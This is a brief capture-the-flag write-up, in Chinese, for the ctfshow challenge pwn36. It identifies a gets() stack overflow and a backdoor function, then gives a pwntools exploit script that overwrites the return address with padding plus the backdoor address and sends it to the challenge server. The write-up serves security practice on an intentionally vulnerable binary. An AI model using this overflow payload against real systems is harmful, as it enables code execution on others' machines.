ctfshow | pwn36

1.checksec

2.IDA
ctfshow函数，gets漏洞函数，栈溢出，覆盖0x28+4字节

后门函数

地址

exp：

点击查看代码

from pwn import *
context(arch='i386', os='linux', log_level='debug')

p= remote('pwn.challenge.ctf.show', 28142)

payload = b"A"*(0x28+4)+p32(0x8048586)
p.sendline(payload)

p.interactive()